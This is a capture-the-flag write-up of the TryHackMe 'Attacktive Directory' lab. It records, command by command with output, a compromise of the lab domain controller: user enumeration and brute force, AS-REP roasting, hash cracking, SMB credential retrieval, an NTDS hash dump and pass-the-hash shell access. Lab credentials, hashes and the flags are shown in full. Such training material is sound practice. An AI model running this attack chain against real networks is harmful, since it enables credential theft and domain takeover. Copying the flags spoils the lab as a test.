Skip to content

THM Attacktive Directory done

Attacktive_Directory

OS:

Windows

Technology:

Active Directory

IP Address:

10.10.81.207

Open ports:

88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-02-26 05:10:05Z)
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc        Microsoft Windows RPC
49673/tcp open  msrpc        Microsoft Windows RPC
49677/tcp open  msrpc        Microsoft Windows RPC
49682/tcp open  msrpc        Microsoft Windows RPC
49688/tcp open  msrpc        Microsoft Windows RPC
49697/tcp open  msrpc        Microsoft Windows RPC

Users and pass:

GROUPS:
THM-AD\Administrator
THM-AD\Guest
THM-AD\krbtgt
THM-AD\ATTACKTIVEDIREC$
ATTACKTIVEDIREC\Administrator
ATTACKTIVEDIREC\Guest
ATTACKTIVEDIREC\DefaultAccount
ATTACKTIVEDIREC\WDAGUtilityAccount

USERS:
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]

CREDS:
svc-admin
management2005
---
backup
backup2517860

Nmap

sudo nmap -Pn -A -sV --script=default,vuln -p- --open -oA 10.10.109.182_nmap_vulns 10.10.109.182

Enum4Linux

─(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacktive_Directory]
└─$ enum4linux -aA spookysec.local | tee spookysec.local_enum4linux

Get username from

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacktive_Directory]
└─$ cat spookysec.local_enum4linux | grep -i "Local User" | awk '{print $2}'
THM-AD\Administrator
THM-AD\Guest
THM-AD\krbtgt
THM-AD\ATTACKTIVEDIREC$
ATTACKTIVEDIREC\Administrator
ATTACKTIVEDIREC\Guest
ATTACKTIVEDIREC\DefaultAccount
ATTACKTIVEDIREC\WDAGUtilityAccount

Download username and password list

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacktive_Directory]
└─$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt ; wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt
--2023-03-02 13:10:08--  https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.111.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 540470 (528K) [text/plain]
Saving to: ‘userlist.txt’

userlist.txt                  100%[==============================================>] 527.80K  1.15MB/s    in 0.4s    

2023-03-02 13:10:09 (1.15 MB/s) - ‘userlist.txt’ saved [540470/540470]

--2023-03-02 13:10:09--  https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 569236 (556K) [text/plain]
Saving to: ‘passwordlist.txt’

passwordlist.txt              100%[==============================================>] 555.89K  3.10MB/s    in 0.2s    

2023-03-02 13:10:09 (3.10 MB/s) - ‘passwordlist.txt’ saved [569236/569236]

Brute force username - kerbrute

python kerbrute/kerbrute.py -users userlist.txt -passwords passwordlist.txt -domain spookysec.local -outputfile 10.10.109.182_kerbrute

Dump all users from kerbrute

cat 10.10.109.182_kerbrute | grep VALID | awk -F "@" '{print $1}' | awk '{print $NF}' > 10.10.109.182_kerbrute_users

Retrieve kerberos ticket

└─$ while read -r line; do python3 /home/kali/.local/bin/GetNPUsers.py spookysec.local/$line -no-pass ; done < 10.10.109.182_kerbrute_users | tee kerberos_ticket 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Getting TGT for james
[-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Getting TGT for svc-admin
[email protected]:6c0ee7713fde0c03e8eeac98695c7c06$cd64ff3269c9c364c807cbbf128e236a49c88df966c85ff1b9a1e3d9aaaded06693e27864bd40020d4e1f79a04c7f94265c5f60dbd15fefbcf245725c10c7b9322be09f93682935d1b3ef20c3230237ee34e16f3617855f60b51ed1bf1c57be75923ae7ca539250e07ad239c28a79cdd91b5207491271f1be5ed9585eae85f83b85383e2d6ec47c96e9f8f6e278d3876fe2727d95a1a560b5205971caa71bc2c1594f36f0cf66018237909853ac742731e140f33cf3e1c8e308e427c21e15c91db0cc5d927c9e2971887be1803e649a94fbad8ba4f02bc0e7916e8a888a46b21c7bc411a13fc2eb5959acd0a5c0f02aa2521

Cracking kerberos hash

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacktive_Directory]
└─$ hashcat -m18200 kerberos_ticket_john /tmp/rockyou.txt                  
...
[email protected]:6c0ee7713fde0c03e8eeac98695c7c06$cd64ff3269c9c364c807cbbf128e236a49c88df966c85ff1b9a1e3d9aaaded06693e27864bd40020d4e1f79a04c7f94265c5f60dbd15fefbcf245725c10c7b9322be09f93682935d1b3ef20c3230237ee34e16f3617855f60b51ed1bf1c57be75923ae7ca539250e07ad239c28a79cdd91b5207491271f1be5ed9585eae85f83b85383e2d6ec47c96e9f8f6e278d3876fe2727d95a1a560b5205971caa71bc2c1594f36f0cf66018237909853ac742731e140f33cf3e1c8e308e427c21e15c91db0cc5d927c9e2971887be1803e649a94fbad8ba4f02bc0e7916e8a888a46b21c7bc411a13fc2eb5959acd0a5c0f02aa2521:management2005

SMB shares map

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacktive_Directory]
└─$ smbclient -L \\spookysec.local -U spookysec.local/svc-admin                  
Password for [SPOOKYSEC.LOCAL\svc-admin]:

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    backup          Disk      
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to spookysec.local failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

List all files from backup share

└─$ smbclient \\\\spookysec.local\\backup -U spookysec.local/svc-admin 
Password for [SPOOKYSEC.LOCAL\svc-admin]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Apr  4 15:08:39 2020
  ..                                  D        0  Sat Apr  4 15:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 15:08:53 2020

        8247551 blocks of size 4096. 3634856 blocks available
smb: \>

Get file from backup share

smb: \> get backup_credentials.txt 
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> exit

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacktive_Directory]
└─$ cat backup_credentials.txt                                             
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

Decode backup_credentials.txt

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacktive_Directory]
└─$ cat backup_credentials.txt | base64 -d
[email protected]:backup2517860

Dump user hashes from domain

──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacktive_Directory]
└─$ /home/kali/.local/bin/secretsdump.py -just-dc [email protected] | tee dump_domain_hashes
Password:
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
...

Flags for users: Administrator, backup, svc-admin

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacktive_Directory]
└─$ evil-winrm -i 10.10.119.11 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
TryHackMe{4ctiveD1rectoryM4st3r}
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\svc-admin\Desktop\user.txt.txt
TryHackMe{K3rb3r0s_Pr3_4uth}
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\backup\Desktop\PrivEsc.txt
TryHackMe{B4ckM3UpSc0tty!}